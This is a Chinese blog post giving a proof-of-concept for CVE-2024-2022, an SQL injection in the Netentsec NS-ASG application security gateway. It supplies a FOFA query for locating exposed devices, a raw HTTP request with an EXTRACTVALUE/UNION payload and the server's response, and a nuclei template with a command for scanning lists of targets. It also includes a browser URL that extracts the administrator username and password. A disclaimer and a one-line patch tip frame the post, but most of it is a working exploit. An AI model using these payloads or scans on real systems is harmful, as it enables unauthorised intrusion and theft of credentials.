CVE-2024-2022漏洞复现(POC)
免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与本平台和发布者无关!!!
漏洞名称
网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入漏洞
漏洞影响
Netentsec NS-ASG Application Security Gateway 6.3版本
漏洞描述
网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性。
Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。
FOFA搜索语句
app="网康科技-NS-ASG安全网关"
漏洞复现
向靶场发送如下数据包,计算md5(102103122)
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
响应内容如下
HTTP/1.1 200 OK
Connection: close
Content-Length: 593
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html
Date: Mon, 19 Feb 2024 12:15:56 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0d PHP/5.3.4
Set-Cookie: PHPSESSID=c575d7043f874671863f5f5751c99670; path=/
X-Powered-By: PHP/5.3.4
<html><body>����ѯ�û�����Ϣ : �������ݿ�ʧ��! <br> SELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(0x7e,(select md5(102103122))
,0x7e)) <br> XPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'<a href="javascript:history.back()">����</a><script language="JavaScript">alert("�������ݿ�ʧ��, ��ȷ������!\n\n��ѯ�û�����Ϣ\nXPATH syntax error: '~6cfe798ba8e5b85feb50164c59f4bec'\nSELECT GroupName FROM ISCGroupTable WHERE GroupId=-1 UNION ALL SELECT EXTRACTVALUE(1,concat(00x7e,(select md5(102103122)),0x7e))");history.back();</script><html><body>
其中包含了字符串6cfe798ba8e5b85feb50164c59f4bec漏洞复现成功
批量漏洞扫描poc
nuclei poc文件内容如下,计算md5(102103122)的值
id: CVE-2024-2022
info:
name: 网康NS-ASG应用安全网关sql注入漏洞
author: fgz
severity: high
description: Netentsec NS-ASG Application Security Gateway 6.3版本中/admin/list_ipAddressPolicy.php接口处存在SQL注入漏洞。通过操纵参数GroupId可以导致SQL注入攻击,攻击者可远程发起攻击窃取数据。
metadata:
max-request: 1
fofa-query: app="网康科技-NS-ASG安全网关"
verified: true
requests:
- raw:
- |+
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
matchers:
- type: dsl
dsl:
- "status_code == 200 && contains(body, '6cfe798ba8e5b85feb50164c59f4bec')"
运行POC
nuclei.exe -t mypoc/cve/CVE-2024-2022.yaml -l data/wangkang.txt
漏洞利用
get请求可以直接通过浏览器访问,获取用户名密码
https://x.x.x.x/admin/list_ipAddressPolicy.php?GroupId=1%20and%20extractvalue(0x1,%20concat(0x1,%20(select%20concat(adminname,%200x7e,%20passwd)%20from%20Admin%20limit%201)))
修复建议
建议您更新当前系统或软件至最新版,完成漏洞的修复。
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果